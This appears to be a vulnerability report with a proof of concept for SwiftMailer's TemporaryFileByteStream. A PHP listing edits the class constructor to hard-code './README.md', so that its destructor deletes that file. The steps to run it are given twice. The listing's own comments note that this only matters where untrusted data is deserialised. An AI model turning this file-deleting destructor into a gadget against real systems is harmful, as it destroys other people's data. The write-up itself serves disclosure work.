Add all of its parent classes and the interfaces they implement.
At the end of the file, add the code
$a = new Swift_ByteStream_TemporaryFileByteStream();
and run the command php poc.php
README.md will be removed.
poc.php
<?php

/**
 * Contract for a byte source that can be read sequentially and repositioned.
 */
interface Swift_OutputByteStream
{
    /**
     * Read up to $length bytes from the stream and advance the read pointer
     * by the number of bytes read.
     *
     * When fewer than $length bytes remain, the remaining bytes are returned.
     * When nothing remains, boolean false is returned.
     *
     * @param int $length
     *
     * @return string|bool
     *
     * @throws Swift_IoException
     */
    public function read($length);

    /**
     * Position the internal read pointer at $byteOffset within the stream.
     *
     * @param int $byteOffset
     *
     * @return bool
     *
     * @throws Swift_IoException
     */
    public function setReadPointer($byteOffset);
}
/**
 * A readable byte stream that is backed by a file and can report its path.
 */
interface Swift_FileStream extends Swift_OutputByteStream
{
    /**
     * Return the complete path of the underlying file.
     *
     * @return string
     */
    public function getPath();
}
/**
 * Contract for objects that keep a keyed collection of stream filters.
 */
interface Swift_Filterable
{
    /**
     * Register a StreamFilter under the name $key.
     *
     * @param Swift_StreamFilter $filter
     * @param string             $key
     */
    public function addFilter(Swift_StreamFilter $filter, $key);

    /**
     * Drop the filter previously registered under $key.
     *
     * @param string $key
     */
    public function removeFilter($key);
}
/**
 * Contract for a byte sink that can buffer writes and mirror them to other
 * bound streams.
 */
interface Swift_InputByteStream
{
    /**
     * Append $bytes to the end of the stream.
     *
     * The stream may buffer the data instead of writing it immediately; call
     * {@link commit()} after write() to force it out.
     *
     * The return value is the sequence ID of the write (1 for the first,
     * 2 for the second, and so on).
     *
     * @param string $bytes
     *
     * @return int
     *
     * @throws Swift_IoException
     */
    public function write($bytes);

    /**
     * Force any bytes currently held in the stream's buffer off the buffer.
     *
     * @throws Swift_IoException
     */
    public function commit();

    /**
     * Attach $is to this stream as an observer.
     *
     * The attached stream receives all data that is written; every
     * {@link write()} and {@link flushBuffers()} operation is mirrored to it.
     *
     * @param Swift_InputByteStream $is
     */
    public function bind(Swift_InputByteStream $is);

    /**
     * Detach a previously bound stream.
     *
     * No error is raised when $is is not bound. Any data still buffered is
     * written to $is before it is detached.
     *
     * @param Swift_InputByteStream $is
     */
    public function unbind(Swift_InputByteStream $is);

    /**
     * Empty the stream and move the internal pointer back to the beginning.
     *
     * @throws Swift_IoException
     */
    public function flushBuffers();
}
/**
 * Base class for writable byte streams that support stream filters and
 * mirroring to bound streams. Subclasses supply the storage through
 * _commit() and _flush().
 */
abstract class Swift_ByteStream_AbstractFilterableInputStream implements Swift_InputByteStream, Swift_Filterable
{
    /**
     * Write sequence; incremented on every write that is not held back.
     */
    protected $_sequence = 0;

    /**
     * StreamFilters, indexed by the key they were registered under.
     */
    private $_filters = array();

    /**
     * Bytes accepted by write() that have not yet been passed to _doWrite().
     */
    private $_writeBuffer = '';

    /**
     * Bound streams.
     *
     * @var Swift_InputByteStream[]
     */
    private $_mirrors = array();

    /**
     * Commit the given bytes to the storage medium immediately.
     *
     * @param string $bytes
     */
    abstract protected function _commit($bytes);

    /**
     * Flush any buffers/content with immediate effect.
     */
    abstract protected function _flush();

    /**
     * Register a StreamFilter on this stream, replacing any filter already
     * stored under the same $key.
     *
     * @param Swift_StreamFilter $filter
     * @param string             $key
     */
    public function addFilter(Swift_StreamFilter $filter, $key)
    {
        $this->_filters[$key] = $filter;
    }

    /**
     * Remove the StreamFilter stored under $key, if there is one.
     *
     * @param string $key
     */
    public function removeFilter($key)
    {
        unset($this->_filters[$key]);
    }

    /**
     * Append $bytes to the write buffer and push the buffer out unless a
     * filter asks for more data first.
     *
     * When any filter's shouldBuffer() returns true the method returns early
     * without a value (null) and without advancing the sequence; otherwise the
     * incremented sequence number is returned.
     *
     * @param string $bytes
     *
     * @return int
     *
     * @throws Swift_IoException
     */
    public function write($bytes)
    {
        $this->_writeBuffer = $this->_writeBuffer.$bytes;

        foreach ($this->_filters as $candidate) {
            $holdBack = $candidate->shouldBuffer($this->_writeBuffer);
            if ($holdBack) {
                return;
            }
        }

        $this->_doWrite($this->_writeBuffer);
        ++$this->_sequence;

        return $this->_sequence;
    }

    /**
     * Push whatever is in the write buffer out of the buffer. The buffer is
     * passed on even when it is empty.
     *
     * @throws Swift_IoException
     */
    public function commit()
    {
        $pending = $this->_writeBuffer;
        $this->_doWrite($pending);
    }

    /**
     * Attach $is as an observer of this stream; it receives every write and
     * flushBuffers() call made through _doWrite() and flushBuffers().
     *
     * @param Swift_InputByteStream $is
     */
    public function bind(Swift_InputByteStream $is)
    {
        $this->_mirrors[] = $is;
    }

    /**
     * Detach $is from this stream.
     *
     * Nothing happens when $is is not bound. When the write buffer is not
     * empty, its content is written to $is before the binding is removed.
     *
     * @param Swift_InputByteStream $is
     */
    public function unbind(Swift_InputByteStream $is)
    {
        foreach ($this->_mirrors as $index => $bound) {
            if ($bound !== $is) {
                continue;
            }

            if ('' !== $this->_writeBuffer) {
                $bound->write($this->_writeBuffer);
            }
            unset($this->_mirrors[$index]);
        }
    }

    /**
     * Write out any buffered bytes, flush the storage, then ask every bound
     * stream to flush as well.
     *
     * @throws Swift_IoException
     */
    public function flushBuffers()
    {
        if ('' !== $this->_writeBuffer) {
            $this->_doWrite($this->_writeBuffer);
        }

        $this->_flush();

        foreach ($this->_mirrors as $bound) {
            $bound->flushBuffers();
        }
    }

    /**
     * Pass $bytes through every registered filter in turn and return the
     * result.
     */
    private function _filter($bytes)
    {
        $filtered = $bytes;
        foreach ($this->_filters as $stage) {
            $filtered = $stage->filter($filtered);
        }

        return $filtered;
    }

    /**
     * Commit the filtered bytes to storage, mirror the unfiltered bytes to the
     * bound streams, and clear the write buffer.
     */
    private function _doWrite($bytes)
    {
        $filtered = $this->_filter($bytes);
        $this->_commit($filtered);

        // Mirrors receive the original bytes, not the filtered ones.
        foreach ($this->_mirrors as $bound) {
            $bound->write($bytes);
        }

        $this->_writeBuffer = '';
    }
}
/**
 * A byte stream backed by a file on disk, with lazily opened read and write
 * handles.
 */
class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream implements Swift_FileStream
{
    /** The internal pointer offset */
    private $_offset = 0;

    /** The path to the file */
    private $_path;

    /** The mode this file is opened in for writing */
    private $_mode;

    /** A lazy-loaded resource handle for reading the file */
    private $_reader;

    /** A lazy-loaded resource handle for writing the file */
    private $_writer;

    /** If magic_quotes_runtime is on, this will be true */
    private $_quotes = false;

    /** If stream is seekable true/false, or null if not known */
    private $_seekable = null;

    /**
     * Create a new FileByteStream for $path.
     *
     * The path is stored as given; no file is opened here. The write mode is
     * 'w+b' when $writable is true and 'rb' otherwise.
     *
     * @param string $path
     * @param bool   $writable if true
     *
     * @throws Swift_IoException when $path is empty
     */
    public function __construct($path, $writable = false)
    {
        if (empty($path)) {
            throw new Swift_IoException('The path cannot be empty');
        }

        $this->_path = $path;

        if ($writable) {
            $this->_mode = 'w+b';
        } else {
            $this->_mode = 'rb';
        }

        // get_magic_quotes_runtime() may not exist, hence the guard.
        if (function_exists('get_magic_quotes_runtime')) {
            if (@get_magic_quotes_runtime() == 1) {
                $this->_quotes = true;
            }
        }
    }

    /**
     * Return the path this stream was constructed with.
     *
     * @return string
     */
    public function getPath()
    {
        return $this->_path;
    }

    /**
     * Read up to $length bytes from the file and advance the stored offset.
     *
     * When fewer bytes remain than requested, the remaining bytes are
     * returned. When nothing remains, the read handle is closed and boolean
     * false is returned.
     *
     * @param int $length
     *
     * @return string|bool
     *
     * @throws Swift_IoException
     */
    public function read($length)
    {
        $handle = $this->_getReadHandle();

        if (feof($handle)) {
            $this->_resetReadHandle();

            return false;
        }

        // Switch magic_quotes_runtime off around the read when it was on.
        if ($this->_quotes) {
            ini_set('magic_quotes_runtime', 0);
        }
        $chunk = fread($handle, $length);
        if ($this->_quotes) {
            ini_set('magic_quotes_runtime', 1);
        }

        $this->_offset = ftell($handle);

        // If we read one byte after reaching the end of the file
        // feof() will return false and an empty string is returned
        if ('' === $chunk && feof($handle)) {
            $this->_resetReadHandle();

            return false;
        }

        return $chunk;
    }

    /**
     * Move the internal read pointer to $byteOffset in the stream.
     *
     * An already open read handle is repositioned at once; otherwise only the
     * stored offset changes. The method body returns no value even though the
     * tag below documents bool.
     *
     * @param int $byteOffset
     *
     * @return bool
     */
    public function setReadPointer($byteOffset)
    {
        if (isset($this->_reader)) {
            $this->_seekReadStreamToPosition($byteOffset);
        }

        $this->_offset = $byteOffset;
    }

    /**
     * Write the bytes to the file, then close the read handle so that the next
     * read reopens the file.
     */
    protected function _commit($bytes)
    {
        $handle = $this->_getWriteHandle();
        fwrite($handle, $bytes);
        $this->_resetReadHandle();
    }

    /** Not used */
    protected function _flush()
    {
    }

    /**
     * Return the read handle, opening the file in 'rb' mode on first use and
     * seeking to the stored offset when that offset is non-zero.
     */
    private function _getReadHandle()
    {
        if (isset($this->_reader)) {
            return $this->_reader;
        }

        $this->_reader = fopen($this->_path, 'rb');
        if (!$this->_reader) {
            throw new Swift_IoException(
                'Unable to open file for reading ['.$this->_path.']'
            );
        }

        if (0 != $this->_offset) {
            $this->_getReadStreamSeekableStatus();
            $this->_seekReadStreamToPosition($this->_offset);
        }

        return $this->_reader;
    }

    /**
     * Return the write handle, opening the file in the configured mode on
     * first use.
     */
    private function _getWriteHandle()
    {
        if (isset($this->_writer)) {
            return $this->_writer;
        }

        $this->_writer = fopen($this->_path, $this->_mode);
        if (!$this->_writer) {
            throw new Swift_IoException(
                'Unable to open file for writing ['.$this->_path.']'
            );
        }

        return $this->_writer;
    }

    /** Close the read handle, if one is open, so it is reopened on next use */
    private function _resetReadHandle()
    {
        if (!isset($this->_reader)) {
            return;
        }

        fclose($this->_reader);
        $this->_reader = null;
    }

    /** Record whether the current read stream reports itself as seekable */
    private function _getReadStreamSeekableStatus()
    {
        $info = stream_get_meta_data($this->_reader);
        $this->_seekable = $info['seekable'];
    }

    /**
     * Move the read stream to $offset.
     *
     * A non-seekable stream is advanced by reading and discarding bytes when
     * the target lies ahead; when it lies behind, the file is first copied
     * into a temporary stream and the seek is done on that copy.
     */
    private function _seekReadStreamToPosition($offset)
    {
        if (null === $this->_seekable) {
            $this->_getReadStreamSeekableStatus();
        }

        if (false === $this->_seekable) {
            $position = ftell($this->_reader);
            if ($position < $offset) {
                $skip = $offset - $position;
                fread($this->_reader, $skip);

                return;
            }
            $this->_copyReadStream();
        }

        fseek($this->_reader, $offset, SEEK_SET);
    }

    /**
     * Replace the read handle with a temporary copy of the file.
     *
     * The copy is held in a php://temp stream when that can be opened, and in
     * a tmpfile() otherwise. The file is reopened from its path and copied in
     * 4096-byte chunks, and the copy is left at the old handle's position.
     */
    private function _copyReadStream()
    {
        $copy = fopen('php://temp/maxmemory:4096', 'w+b');
        if (!$copy) {
            // Fall back to a real temporary file when php://temp is unavailable.
            $tmpDirUsable = function_exists('sys_get_temp_dir') && is_writable(sys_get_temp_dir());
            $copy = $tmpDirUsable ? tmpfile() : false;
            if (!$copy) {
                throw new Swift_IoException('Unable to copy the file to make it seekable, sys_temp_dir is not writable, php://memory not available');
            }
        }

        $position = ftell($this->_reader);
        fclose($this->_reader);

        $source = fopen($this->_path, 'rb');
        if (!$source) {
            throw new Swift_IoException('Unable to open file for copying ['.$this->_path.']');
        }

        fseek($copy, 0, SEEK_SET);
        while (!feof($source)) {
            $chunk = fread($source, 4096);
            fwrite($copy, $chunk);
        }
        fseek($copy, $position, SEEK_SET);
        fclose($source);

        $this->_reader = $copy;
    }
}
/**
 * Copy of the temporary-file stream as modified for this proof of concept.
 *
 * The constructor hands a fixed path to the parent instead of the name that
 * tempnam() produced, and the destructor removes whatever getPath() returns.
 */
class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream
{
    /**
     * Generate a temporary file name, then open the stream on "./README.md".
     *
     * The generated name is only checked for failure and is not used again in
     * this listing, so the hard-coded path is what the destructor deletes.
     *
     * NOTE(review): the path is fixed by editing the class source. This listing
     * does not show a party outside the code controlling it.
     *
     * @throws Swift_IoException when no temporary file name can be obtained
     */
    public function __construct()
    {
        $generated = tempnam(sys_get_temp_dir(), 'FileByteStream');
        if (false === $generated) {
            throw new Swift_IoException('Failed to retrieve temporary file name.');
        }

        parent::__construct("./README.md", true);
    }

    /**
     * Delete the file at getPath() when the object is destroyed.
     *
     * The only check is that the file exists; there is no check that this
     * object created it. Errors from unlink() are suppressed with @.
     *
     * NOTE(review): a destructor that deletes files is only as safe as the
     * stored path. Code that builds instances from external state (for
     * example by deserialising untrusted data) should ensure the path is one
     * this object generated before deleting it. Confirm how instances are
     * created in the deployment under review.
     */
    public function __destruct()
    {
        if (!file_exists($this->getPath())) {
            return;
        }

        @unlink($this->getPath());
    }
}
// Create the stream object. Nothing else uses it in this listing; its
// __destruct() runs when the object is destroyed.
$a = new Swift_ByteStream_TemporaryFileByteStream();
Vulnerable path /vendor/swiftmailer/lib/classes/Swift/ByteStream/TemporaryFileByteStream.php
Vulnerable code
Line 36 of TemporaryFileByteStream.php calls the unlink() function.
Vulnerability exploitation process
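Copy TemporaryFileByteStream.php to poc.php.
Modify the __construct() of Swift_ByteStream_TemporaryFileByteStream so that it passes "./README.md" to the parent constructor, as shown in the listing.
Add all of its parent classes and the interfaces they implement.
At the end of the file, add the code
$a = new Swift_ByteStream_TemporaryFileByteStream();
and run the command
php poc.php
README.md will be removed.
poc.php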